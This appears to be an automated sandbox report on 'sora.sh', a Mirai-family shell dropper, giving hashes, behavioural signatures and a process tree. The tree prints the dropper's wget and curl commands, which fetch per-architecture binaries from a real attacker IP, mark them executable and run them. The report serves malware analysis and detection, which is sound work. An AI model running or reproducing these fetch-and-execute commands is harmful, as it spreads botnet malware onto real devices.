Analysis
  max time kernel: 149s
  max time network: 175s
  platform: debian-9_armhf
  resource: debian9-armhf-20240611-en
  resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
  submitted: 29-08-2024 20:19
Tasks
  Static task static1
  Behavioral task behavioral1: sample sora.sh, resource ubuntu1804-amd64-20240508-en
  Behavioral task behavioral2: sample sora.sh, resource debian9-armhf-20240611-en
  Behavioral task behavioral3: sample sora.sh, resource debian9-mipsbe-20240729-en
General
  Target: sora.sh
  Size: 1KB
  MD5: 4bad6b7a8f3a112f1e8a64415b2c5e57
  SHA1: 80386ebec3b511cd2a07da88e300a62590b8d889
  SHA256: 4483a53f61944b8183d1941626bb43ff3a0f8196930441fe4c791a76cd87fb77
  SHA512: da9c99687356c636a26e11083032cee8d31f7105e64ade4d20f54e3ba22085ed9a5749674684622dce428287410b404b84d546a91e050afadf0b7b7485647aed
Malware Config
  Extracted: mirai (LZRD)
Signatures

Contacts a large (18459) amount of remote hosts (1 TTP)
  This may indicate a network scan to discover remotely running services.

Creates a large amount of network flows (1 TTP)
  This may indicate a network scan to discover remotely running services.

Executes dropped EXE (10 IoCs)
  ioc          pid  Process
  /tmp/robben  720  robben
  /tmp/robben  735  robben
  /tmp/robben  752  robben
  /tmp/robben  769  robben
  /tmp/robben  783  robben
  /tmp/robben  788  robben
  /tmp/robben  793  robben
  /tmp/robben  804  robben
  /tmp/robben  810  robben
  /tmp/robben  818  robben

Modifies Watchdog functionality (1 TTP, 2 IoCs)
  Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
  description                   ioc                 Process
  File opened for modification  /dev/watchdog       robben
  File opened for modification  /dev/misc/watchdog  robben

YARA rule matches
  resource                         yara_rule
  behavioral2/files/fstream-1.dat  upx
  behavioral2/files/fstream-2.dat  upx
  behavioral2/files/fstream-3.dat  upx
  behavioral2/files/fstream-5.dat  upx

Checks CPU configuration (1 TTP, 10 IoCs)
  Checks CPU information, which indicates whether the system is a virtual machine.
  description              ioc            Process
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl

Reads runtime system information (51 IoCs)
  Reads data from the /proc virtual filesystem.
  description              ioc                            Process
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/642/exe                  robben
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/842/exe                  robben
  File opened for reading  /proc/self/exe                 robben
  File opened for reading  /proc/836/exe                  robben
  File opened for reading  /proc/838/exe                  robben
  File opened for reading  /proc/self/exe                 robben
  File opened for reading  /proc/585/exe                  robben
  File opened for reading  /proc/596/exe                  robben
  File opened for reading  /proc/832/exe                  robben
  File opened for reading  /proc/846/exe                  robben
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/834/exe                  robben
  File opened for reading  /proc/794/exe                  robben
  File opened for reading  /proc/725/exe                  robben
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/844/exe                  robben
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/591/exe                  robben
  File opened for reading  /proc/649/exe                  robben
  File opened for reading  /proc/655/exe                  robben
  File opened for reading  /proc/824/exe                  robben
  File opened for reading  /proc/828/exe                  robben
  File opened for reading  /proc/840/exe                  robben
  File opened for reading  /proc/737/exe                  robben
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/588/exe                  robben
  File opened for reading  /proc/595/exe                  robben
  File opened for reading  /proc/647/exe                  robben
  File opened for reading  /proc/648/exe                  robben
  File opened for reading  /proc/830/exe                  robben
  File opened for reading  /proc/831/exe                  robben
  File opened for reading  /proc/798/exe                  robben
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/650/exe                  robben
  File opened for reading  /proc/812/exe                  robben
  File opened for reading  /proc/826/exe                  robben

Writes file to tmp directory (20 IoCs)
  Malware often drops required files in the /tmp directory.
  description                   ioc             Process
  File opened for modification  /tmp/sora.arm6  wget
  File opened for modification  /tmp/sora.arm6  curl
  File opened for modification  /tmp/sora.arm7  wget
  File opened for modification  /tmp/sora.m68k  curl
  File opened for modification  /tmp/sora.mpsl  curl
  File opened for modification  /tmp/sora.ppc   wget
  File opened for modification  /tmp/sora.m68k  wget
  File opened for modification  /tmp/sora.sh4   wget
  File opened for modification  /tmp/sora.sh4   curl
  File opened for modification  /tmp/sora.arm4  curl
  File opened for modification  /tmp/sora.x86   curl
  File opened for modification  /tmp/robben     sora.sh
  File opened for modification  /tmp/sora.arm5  wget
  File opened for modification  /tmp/sora.x86   wget
  File opened for modification  /tmp/sora.mips  curl
  File opened for modification  /tmp/sora.mpsl  wget
  File opened for modification  /tmp/sora.arm5  curl
  File opened for modification  /tmp/sora.arm7  curl
  File opened for modification  /tmp/sora.ppc   curl
  File opened for modification  /tmp/sora.mips  wget
Processes
(process tree: depth 1 is the submitted sample, depth 2 are the processes it spawned; each entry is PID, image path, command line, and the signatures triggered by that process)

PID 650 (depth 1) /tmp/sora.sh: /tmp/sora.sh
  signatures: Writes file to tmp directory

PID 652 (depth 2) /usr/bin/wget: wget http://154.216.17.67/bins/sora.x86
  signatures: Writes file to tmp directory
PID 705 (depth 2) /usr/bin/curl: curl -O http://154.216.17.67/bins/sora.x86
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
PID 715 (depth 2) /bin/cat: cat sora.x86
PID 717 (depth 2) /bin/chmod: chmod +x robben sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
PID 720 (depth 2) /tmp/robben: ./robben Payload
  signatures: Executes dropped EXE

PID 722 (depth 2) /usr/bin/wget: wget http://154.216.17.67/bins/sora.mips
  signatures: Writes file to tmp directory
PID 731 (depth 2) /usr/bin/curl: curl -O http://154.216.17.67/bins/sora.mips
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
PID 733 (depth 2) /bin/cat: cat sora.mips
PID 734 (depth 2) /bin/chmod: chmod +x robben sora.mips sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
PID 735 (depth 2) /tmp/robben: ./robben Payload
  signatures: Executes dropped EXE

PID 738 (depth 2) /usr/bin/wget: wget http://154.216.17.67/bins/sora.mpsl
  signatures: Writes file to tmp directory
PID 741 (depth 2) /usr/bin/curl: curl -O http://154.216.17.67/bins/sora.mpsl
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
PID 749 (depth 2) /bin/cat: cat sora.mpsl
PID 751 (depth 2) /bin/chmod: chmod +x robben sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
PID 752 (depth 2) /tmp/robben: ./robben Payload
  signatures: Executes dropped EXE

PID 754 (depth 2) /usr/bin/wget: wget http://154.216.17.67/bins/sora.arm4
PID 761 (depth 2) /usr/bin/curl: curl -O http://154.216.17.67/bins/sora.arm4
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
PID 766 (depth 2) /bin/cat: cat sora.arm4
PID 768 (depth 2) /bin/chmod: chmod +x robben sora.arm4 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
PID 769 (depth 2) /tmp/robben: ./robben Payload
  signatures: Executes dropped EXE

PID 771 (depth 2) /usr/bin/wget: wget http://154.216.17.67/bins/sora.arm5
  signatures: Writes file to tmp directory
PID 778 (depth 2) /usr/bin/curl: curl -O http://154.216.17.67/bins/sora.arm5
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
PID 781 (depth 2) /bin/cat: cat sora.arm5
PID 782 (depth 2) /bin/chmod: chmod +x robben sora.arm4 sora.arm5 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
PID 783 (depth 2) /tmp/robben: ./robben Payload
  signatures: Executes dropped EXE

PID 784 (depth 2) /usr/bin/wget: wget http://154.216.17.67/bins/sora.arm6
  signatures: Writes file to tmp directory
PID 785 (depth 2) /usr/bin/curl: curl -O http://154.216.17.67/bins/sora.arm6
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
PID 786 (depth 2) /bin/cat: cat sora.arm6
PID 787 (depth 2) /bin/chmod: chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
PID 788 (depth 2) /tmp/robben: ./robben Payload
  signatures: Executes dropped EXE; Reads runtime system information

PID 789 (depth 2) /usr/bin/wget: wget http://154.216.17.67/bins/sora.arm7
  signatures: Writes file to tmp directory
PID 790 (depth 2) /usr/bin/curl: curl -O http://154.216.17.67/bins/sora.arm7
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
PID 791 (depth 2) /bin/cat: cat sora.arm7
PID 792 (depth 2) /bin/chmod: chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
PID 793 (depth 2) /tmp/robben: ./robben Payload
  signatures: Executes dropped EXE; Modifies Watchdog functionality; Reads runtime system information

PID 797 (depth 2) /usr/bin/wget: wget http://154.216.17.67/bins/sora.ppc
  signatures: Writes file to tmp directory
PID 801 (depth 2) /usr/bin/curl: curl -O http://154.216.17.67/bins/sora.ppc
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
PID 802 (depth 2) /bin/cat: cat sora.ppc
PID 803 (depth 2) /bin/chmod: chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
PID 804 (depth 2) /tmp/robben: ./robben Payload
  signatures: Executes dropped EXE

PID 806 (depth 2) /usr/bin/wget: wget http://154.216.17.67/bins/sora.m68k
  signatures: Writes file to tmp directory
PID 807 (depth 2) /usr/bin/curl: curl -O http://154.216.17.67/bins/sora.m68k
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
PID 808 (depth 2) /bin/cat: cat sora.m68k
PID 809 (depth 2) /bin/chmod: chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
PID 810 (depth 2) /tmp/robben: ./robben Payload
  signatures: Executes dropped EXE

PID 812 (depth 2) /usr/bin/wget: wget http://154.216.17.67/bins/sora.sh4
  signatures: Writes file to tmp directory
PID 815 (depth 2) /usr/bin/curl: curl -O http://154.216.17.67/bins/sora.sh4
  signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
PID 816 (depth 2) /bin/cat: cat sora.sh4
PID 817 (depth 2) /bin/chmod: chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.sh4 sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
PID 818 (depth 2) /tmp/robben: ./robben Payload
  signatures: Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Downloads